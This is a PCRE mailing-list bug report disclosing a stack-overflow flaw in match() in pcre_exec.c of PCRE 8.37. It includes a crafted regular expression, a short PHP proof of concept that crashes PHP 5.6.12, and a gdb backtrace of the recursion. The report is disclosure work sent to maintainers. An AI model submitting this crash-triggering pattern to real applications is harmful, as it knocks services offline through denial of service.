[pcre-dev] [Bug 1673] New: PCRE Library Call Stack Overflow …

Top Page
Delete this message
Author: admin
Date:  
To: pcre-dev
Subject: [pcre-dev] [Bug 1673] New: PCRE Library Call Stack Overflow Vulnerability in pcre_exec.c
https://bugs.exim.org/show_bug.cgi?id=1673

            Bug ID: 1673
           Summary: PCRE Library Call Stack Overflow Vulnerability in
                    pcre_exec.c
           Product: PCRE
           Version: 8.37
          Hardware: All
                OS: All
            Status: NEW
          Severity: security
          Priority: medium
         Component: Code
          Assignee: ph10@???
          Reporter: rubymail@???
                CC: pcre-dev@???


I. Summary
PCRE is a regular expression C library inspired by the regular expression
capabilities in the Perl programming language. The PCRE library is incorporated
into a number of prominent programs, such as Adobe Flash, Apache, Nginx, PHP.
PCRE library is prone to a vulnerability which leads to Stack Overflow.
Without enough bound checking inside match(), the stack memory could be
overflowed via a crafted regular expression.
------------------------------------------------------------------
II. Description
Latest version of PCRE is prone to a Stack Overflow vulnerability which could
caused by the following regular expression.

/(?(?=.*b)b|^(?(?=.*b)br^)+)+/

To reproduce the problem, we could use pcretest provide by PCRE library or
applications which is wrapped with PCRE such as PHP.
For pcretest, simply type the regular expression after the re>
For PHP, latest version of PHP 5.6.12 (wrapped with PCRE 8.37) could be
triggered by following code snippet.

<?php
preg_match("/(?(?=.*b)b|^(?(?=.*b)br^)+)+/","ADLAB");
?>

Other versions and applications may also be affected.

Following test is conveyed under Ubuntu 14.10 x64 with php 5.6.12:
==============================================================
(gdb) r poc.php
Starting program: /home/bins/php/sapi/cli/php poc.php

Program received signal SIGSEGV, Segmentation fault.
0x00000000005dcd93 in match (eptr=0x7ffff7eb2e2d "", ecode=0x1f8a8eb "\035bx",
mstart=0x7ffff7eb2e28 "ADLAB",
    offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=0) at
/home/bins/php/ext/pcre/pcrelib/pcre_exec.c:516
516     {
(gdb) bt
#0  0x00000000005dcd93 in match (eptr=0x7ffff7eb2e2d "", ecode=0x1f8a8eb
"\035bx", mstart=0x7ffff7eb2e28 "ADLAB",
    offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=0) at
/home/bins/php/ext/pcre/pcrelib/pcre_exec.c:516
#1  0x0000000000620db8 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb
"\035bx", mstart=0x7ffff7eb2e28 "ADLAB",
    offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15850)
    at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:6178
#2  0x00000000005e7c57 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb
"\035bx", mstart=0x7ffff7eb2e28 "ADLAB",
    offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15849)
    at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:1541
#3  0x00000000005ef607 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb
"\035bx", mstart=0x7ffff7eb2e28 "ADLAB",
    offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15848)
    at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:1388
#4  0x0000000000635839 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb
"\035bx", mstart=0x7ffff7eb2e28 "ADLAB",
    offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15847)
    at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:2061
#5  0x0000000000635839 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb
"\035bx", mstart=0x7ffff7eb2e28 "ADLAB",
    offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15846)
    at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:2061
#6  0x0000000000635839 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb
"\035bx", mstart=0x7ffff7eb2e28 "ADLAB",
    offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15845)
    at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:2061
#7  0x0000000000635839 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb
"\035bx", mstart=0x7ffff7eb2e28 "ADLAB",
    offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15844)
    at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:2061
------------------------------------------------------------------
III. Impact
Stack Overflow
------------------------------------------------------------------
IV. Affected
PCRE 8.37 is confirmed to be vulnerable.
PCRE2 is not affected. 
Other applications may also be affected.
------------------------------------------------------------------
V. Credit
Wen Guanxing from Venustech ADLAB is credited for this vulnerability.


--
You are receiving this mail because:
You are on the CC list for the bug.